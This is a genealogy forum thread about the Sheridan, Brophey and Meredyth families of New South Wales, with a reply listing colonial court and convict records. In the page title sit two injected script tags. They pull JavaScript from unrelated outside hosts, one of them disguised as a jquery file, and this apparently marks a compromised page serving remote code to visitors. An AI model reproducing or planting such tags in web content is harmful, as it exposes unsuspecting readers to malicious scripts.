Looking for Brophey, Gunn, Sheridan, Tressiter, Treharne, Meredyth, Yates NSW Australia<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for Brophey, Gunn, Sheridan, Tressiter, Treharne, Meredyth, Yates NSW Australia

Query by meredyth

The convict John Sheridan transported from Ireland on the Larkin to NSW in 1817, was also known as Dublin Jack Sheridan, for whom a reward was posted in the Sydney Gazette of 1826. He was freed by servitude, and appears to have had a son around 1857, William John Sheridan of Singleton NSW, whose daughter Maude Claire married into the Brophey family, free immigrants from Ireland.

Dublin Jack's great great granddaughter Jeanette Brophey married Brian Meredyth, descended from Old King Cole (Rodhri Mawr) and thereafter Sir Richard Meredyth who was a Bishop in Ireland in 1592, having spent 10 years in the Tower of London for treason, for which he was later exonerated by Elizabeth 1. His descendant Charles Augustus Jervis Meredyth was a taxi driver in Sandy Bay, Hobart, when he inherited the title, thus becoming known as the Cabman Baronet.Hence there has been a reunion in Australia of previous enemy factions in Ireland, after over 4 centuries.

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by meredyth Profile | Research | Contact | Subscribe | Block this user
on 2008-03-09 11:03:35

meredyth , from Sydney, has been a Family Tree Circles member since Mar 2008. is researching the following names: SHERIDAN, HUGHES, BUCKLEY and 5 other(s).

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by allycat on 2010-05-18 19:09:18

Dear Meredyth, Hi. If you click on my username and click on 'contact' you can send me a message under the private messaging system. I would like to invite you electronically via your email address to our family tree online at Geni.

In my research with another distant cousin of mine regarding our CANTWELL forbears and their descendants I'm looking into all the families interconnected, and also helping my cousin research his KENNA ancestors/descendants. That's where the SHERIDAN etc. names come into it. We were always aware of 'Dublin Jack' but didn't have any more information than that. One of Dublin Jack's daughters in law was Johanna (Hanna) KENNA who married William John SHERIDAN in 1877 at Maitland. My connection is two of Johanna KENNA's sisters married two CANTWELL brothers in my own personal family tree.

Incidentally, I have lots of YATES names in my tree from Greta, Maitland, Cessnock and Branxton NSW connected to the KENNAs and DUNNE families.

Best wishes,

by allycat on 2010-05-18 23:58:55

# Family Name First Name Ship Date Location Reference Remarks
122241 Sheredan (Sheridan) John Neptune 1838 1842 23 August Patrick Plains GG Granted Ticket of Leave
27405 Sheridan - - 1830 18 July Port Stephens Early Days of Port Stephens Apprehended on suspicion of robbing Daniel Ivey's house
27408 Sheridan - - 1830 Port Stephens Early Days of Port Stephens Sentenced to Norfolk Island for robbery
92809 Sheridan - - 1852 14 August Hanging Rock MM Each in his party made a 100 pounds at the Hanging Rock gold field
13838 Sheridan Catherine - 1832 14 June Maitland SG William Cain assigned servant
27991 Sheridan Catherine - 1824 13 March Newcastle CSI Joseph Alden assigned servant
70631 Sheridan Catherine - 1824 County Northumberland CSI James Miller per 'Canada' re assigned from John Earl to Catherine Sheridan
93981 Sheridan Catherine - 1834 18 June Situated at Maitland bounded by the road running through Maitland; on the East by land belonging to Elliott; on the Suth by land of Mr. Coxen; on the South by land owned by Mitchell GG 1834 Edward Sparke's claim to 5 acres of land promised to Catherine Sheridan
115682 Sheridan Catherine - 1827 Hunters River Accounts and Papers Thirteen Volumes Application for 3 convicts
77033 Sheridan Catherine Francis & Eliza 1815 1815 Newcastle CSI On list of prisoners to be sent to Newcastle per Lady Nelson
77034 Sheridan Catherine Francis & Eliza 1815 1823 Hunter River CSI On account of maize due from settlers on banks of the Hunter River to the Govt. at Newcastle
77035 Sheridan Catherine Francis & Eliza 1815 1823 Newcastle CSI Re permission to marry at Newcastle
22509 Sheridan Edward Ferguson 1829 1833 14 November Paterson SG Obtained Ticket of Leave
100519 Sheridan Ellen - 1853 1 June Maitland MM Charged William Hoy with using abusive language. Case dismissed as she had aggravated Hoy
91982 Sheridan James - 1863 Murrurundi Australian Almanac Serjeant of Police
115579 Sheridan James - 1858 2 October Pringle's Paddock, near Muswellbrook The Moreton Bay Courier Witness at the trial of James Hutchinson who was found not guilty of murder at Pringle's Paddock, near Muswellbrook
133384 Sheridan James Forth 1835 1837 Maitland GRC Age 13. Assigned to Hamilton Collins Sempill
28602 Sheridan Mathew - 1831 8 January Port Stephens SG Sentence of death passed for stealing from Daniel Ivey
100629 Sheridan Matthew (Mathew) - 1831 18 August - SG Matthew Sheridan and wife had been confined in jail on a charge of felony since May and were entitled to be discharged on the last day of the last session of court
83406 Sheridan Michael - 1851 7 May - MM Bullock driver. Charged under the Masters & Servants Act by Francis Drew after he left his team in the care of another person and drove the bullock team of Robert Turner's to Maitland
# Family Name First Name Ship Date Location Reference Remarks
88303 Sheridan Michael N - 1852 14 February Maitland MM Claim to obtain wages from Elizabeth Turner postponed for a week
88443 Sheridan Michael N - 1852 21 February Maitland MM Claim for wages owed by Elizabeth Turner dismissed by the bench
98465 Sheridan Neptune - 1853 12 March Maitland MM Charged John Chapman and Richard Stark with assault. Case dismissed
98468 Sheridan Neptune - 1853 12 March Maitland MM Fined 20s for striking Mary Glew in the face without provocation
98627 Sheridan Neptune - 1853 19 March Maitland MM Charged John Chapman with assaulting him by shaking his fist in Sheridan's face. Case dismissed
37357 Sheridan Patrick - 1835 12 February - SC Lego'me, aboriginal native, indicted for highway robbery of Sheridan
97653 Sheridan Patrick - 1830 4 March ?Sydney SG Found guilty of stealing leather and other articles belonging to Robert Hunt. Sentenced to be worked in irons on public roads for 12 months
97654 Sheridan Patrick - 1831 16 July - SG Sentenced to be worked in chains at Norfolk Island for the term of his natural life for bushranging and highway robbery
97655 Sheridan Patrick - 1827 16 November Sydney SG Shoemaker. Sentenced to 7 days on the treadmill for being absent without leave.
97656 Sheridan Patrick - 1828 14 January Sydney SG Prisoner of the Crown. Apprehended by the chief constable at 12 oclock at night in Kent Street. Sentenced to 6 mths to an iron gang
114641 Sheridan Patrick - 1830 20 July Port Stephens In the Service of the Company: letters of Sir Edward Parry, Commissioner to the Australian Agricultural company: volume 1, December 1829 - June 1832. Letter no 172 Assigned servant to the A.A. Company. Committed for trial on the evidence of 2 children who were present in a house when Sheridan committed robbery
114782 Sheridan Patrick - 1831 31 January Port Stephens In the Service of the Company: letters of Sir Edward Parry, Commissioner to the Australian Agricultural company: volume 1, December 1829 - June 1832 Letter no 329 Prisoner of the Crown lately in the service of the A.A. Co and convicted at Supreme Court of robbing the house of Daniel Ivey at Port Stephens. Under sentence of death. Reports that other men were responsible for the crime.
97651 Sheridan Patrick James Pattison 1830 1831 12 August Newcastle NGE Labourer from Co. Meath. Admitted to Newcastle gaol 12 August. To be returned to govt., service, his master having no agent to receive him from the General Hospital. Sent to road party 15 August
97652 Sheridan Patrick James Pattison 1830 1837 Newcastle GRC Aged 27.
115764 Sheridan Patrick James Pattison 1830 1832 1 March - SG Labourer and blacksmith aged 19 from Co. Meath. 5' 8" brown eyes, brown hair, ruddy compl., Absconded from No. 42 road gang
40477 Sheridan Patrick Mangles 1826 1828 Port Stephens 1828 Census 25 yrs old. Assigned to Australian Agricultural Company
95830 Sheridan William - 1852 30 October Maitland MM Witness in court for Michael Dalton
93224 Sheridan (Sherridan) Edward Ferguson 1829 1831 7 March Newcastle NGE Native of Co. Kildare. Labourer. Sentenced to 7 days solitary confinement by Newcastle Bench for neglect of duty. Discharged to prisoner barracks 14 March. Orderly conduct in gaol
77036 Sheridan (Sherridan) Patrick Chapman 1817 1819 Newcastle CSI On list of prisoners sent to Newcastle

SOURCE: Free Settler or Felon? SHERIDAN search results...

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